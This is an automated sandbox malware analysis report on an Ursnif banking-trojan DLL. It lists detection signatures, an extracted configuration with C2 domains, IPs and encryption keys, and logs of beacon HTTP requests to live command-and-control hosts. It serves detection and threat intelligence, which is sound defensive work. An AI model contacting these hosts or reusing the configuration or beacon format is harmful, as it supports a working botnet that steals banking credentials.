Windows Analysis Report
7078612.dll

Overview

General Information

Sample Name: 7078612.dll
Analysis ID: 752294
MD5: cba263871219062d981111b00cc131fc
SHA1: 50e2c7caf7dd0f826bc6e814bd62fbb39982ceed
SHA256: 65f687a5c0e757cd8e296f8b0453b27726e5017502e93dcb8379d59fe9c056a3
Tags: dllUrsnif
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Self deletion via cmd or bat file
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/l Avira URL Cloud: Label: malware
Source: http://internetcoca.in/ Avira URL Cloud: Label: malware
Source: http://internetcoca.in/a Avira URL Cloud: Label: malware
Source: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob Avira URL Cloud: Label: malware
Source: internetcoca.in Virustotal: Detection: 20% Perma Link
Source: 7078612.dll Joe Sandbox ML: detected
Source: 00000003.00000002.684277856.0000000000D90000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "bdyFPOOFadPIE+3Dpt3w3yYYobtlUfGHmkNXXhEHJZrgq+pMKFl/sc2wfLGDAcGr6aqONRURpCfnbKsvcUbIGVS0tUVr4USeghefWwgL9ZQvVt+Wms+/fsaQ4VA9haNvCrTsNgywFQRd86atcQ5HZEvnzynAU+sWx3vgEy3de6xYedEo9QwkMZmOY1efWAGBuAhNzJ+zgYb92lBu1HFwMVWas966cpiEbynar9CpsNFqdLF1t7yizeW2KS+obTRWgYChp39Cmdcy6zxrZh+Fibssh3hcSOGQo3AqO9V622C23Z3ve8vsR2k0wPicse7/Fu+H0+OaWRh90FFOWVCYiIyOZEuvmKiznuluuDx1iWA=", "c2_domain": ["internetwork.top", "interspin.top", "groupconnect.info", "onlinegroup.pw", "onlinesgroup.top", "directoronliner.ru", "directoronliner.su", "premiumdocs.ru", "premiumdocs.info", "dendexmm.com", "fortrexmll.com", "31.207.46.12", "31.207.46.126"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "0gV5XR1ZycScNvAe", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5050", "SetWaitableTimer_value": "1"}
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D52F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_050D52F6
Source: 7078612.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp

Networking

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.41.44.51 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.207.46.124 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: internetcoca.in
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: meganetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.105.103.207 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 62.173.149.9 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: supernetwork.top
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49711 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49711 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50505 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49712 -> 31.41.44.51:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49718 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49718 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49722 -> 31.207.46.124:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49722 -> 31.207.46.124:80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View ASN Name: ASRELINKRU ASRELINKRU
Source: Joe Sandbox View ASN Name: HOSTKEY-ASNL HOSTKEY-ASNL
Source: Joe Sandbox View IP Address: 172.105.103.207 172.105.103.207
Source: global traffic HTTP traffic detected: GET /jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJNuMH/RpW6bg0QRvZX/QXfPDGL10GT/SdaapIAklDbfEO/Uj_2BAmamwU2u8BHod3aP/PgD0dTDTJEMSc0UK/j1e9AdZnRhxmLd2/iyZSWXfqsPP5Mz2_2F/RxfeMhVZi/snsYr1rBTn9DbB3n1htJ/THaNUdrjEpMaPV5FZB0/hnSI3F95hi8RSrq2PqAvJg/NhyoyNMSlw300/RuRhnMAi/yuKjfRG8BZDb0ZtEsV/Y0c.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: meganetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/ZLc8q9AvlDxusKBXZEkxW/7UMIMirPk3DmAiEd/MIUggpPiQ7ixyfB/FE8tNplPzMQkKS2ZFu/JXFIU12Aw/jv5mVYFsQ20lg4INnqbs/F8R3I0LYx88osTnvgV0/etG2XQldFgo6x4JgYsuQNF/j4JQ96Ft17Rz7/eCxN97dQ/rJhcjYfddaM8eJW_2Fean2z/A92cM0Ky22/lOBKLw85du6YHY_2B/3g2GAbm.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: supernetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZs5LHn1/1_2BHT6MZAolHFOS/6QcVb6Sy1jmNhbf/GYszPrGfJFenuaRQz6/_2BhFQScX/2I2_2FVeVKW5cCoy7gT4/8KYwuw3rx60555o08Kn/opCh843XnHy29nfuXF6b2z/huTk_2FUjzUDI/ISxuKPlx/DZKqk4ugdLqCYc3dzjZ_2Br/21q0mwi2jT/PIT_2FnEyJ3MqtVh6/qexCz0xFpyCT/BYpr5_2B38q/mb5tW8uXYlLBsL/HRJTV7U9DpT/Lb.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSaztxByX/Gj2CVVFo49mQFm/C9zaruRo3JRcHrjSr91x3/QFYBC_2FsxN_2B7X/uufaTAjpOm99699/Pq_2FSETrsZSqN9Ojz/3qeuXW2xr/R0a72t7BsPAzZ_2BbGig/RJ4QPZizbCIE_2Fbc3V/bnU9fiqNJ0ptmBxGj2iZqV/2_2BtpYpuaB39/FW0ST0qr/ePsn6GFPOwexxSy3EgaplHS/uHjfw_2BI_/2BU_2B8F8OF00pKIM/YJkKjo7czRDc/E_2BThKsX/cG_2Fr.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv_2Ft/Q5KyRgYr/iv5NSA792h1xHcDS5L6fsEG/6f6Mo_2Fxe/zRCCWBAwTeLJqLbV9/kqNgWULptALz/6SvcsPi5EHX/ePWs4WCPyL8a8x/7zSS0_2F0FPHafzsv8Nrj/_2FvbJqIrbuIliTu/28Zs8gl0EBncgLE/E0Xb7wwqBhrlCP2lDF/LuKqKVbSw/I0P0F2TMmM1CY00Wt6n5/Qvz8fbopIWFtWKI6Q1E/CrYECeKd/SC2ahZciZ/j0v83.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.207.46.124/jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSazt
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.207.46.124/jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.207.46.124/jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZ
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/jerry/aSMHh5W2R09y97_/2BTh3L56RxwrH5JH4F/CB8VvX3np/o6NOLngWb2K_2FSc_2BM
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000011.00000002.882964274.000002EFAB757000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://internetcoca.in/
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://internetcoca.in/a
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398416154.0000000001086000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/l
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://meganetwork.top/
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://meganetwork.top/jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJ
Source: powershell.exe, 00000011.00000002.884674469.000002EFAB931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://supernetwork.top/
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://supernetwork.top/%
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://supernetwork.top/E
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://supernetwork.top/jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/Z
Source: unknown DNS traffic detected: queries for: meganetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D466D ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError, 3_2_050D466D
Source: global traffic HTTP traffic detected: GET /jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJNuMH/RpW6bg0QRvZX/QXfPDGL10GT/SdaapIAklDbfEO/Uj_2BAmamwU2u8BHod3aP/PgD0dTDTJEMSc0UK/j1e9AdZnRhxmLd2/iyZSWXfqsPP5Mz2_2F/RxfeMhVZi/snsYr1rBTn9DbB3n1htJ/THaNUdrjEpMaPV5FZB0/hnSI3F95hi8RSrq2PqAvJg/NhyoyNMSlw300/RuRhnMAi/yuKjfRG8BZDb0ZtEsV/Y0c.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: meganetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/ZLc8q9AvlDxusKBXZEkxW/7UMIMirPk3DmAiEd/MIUggpPiQ7ixyfB/FE8tNplPzMQkKS2ZFu/JXFIU12Aw/jv5mVYFsQ20lg4INnqbs/F8R3I0LYx88osTnvgV0/etG2XQldFgo6x4JgYsuQNF/j4JQ96Ft17Rz7/eCxN97dQ/rJhcjYfddaM8eJW_2Fean2z/A92cM0Ky22/lOBKLw85du6YHY_2B/3g2GAbm.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: supernetwork.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
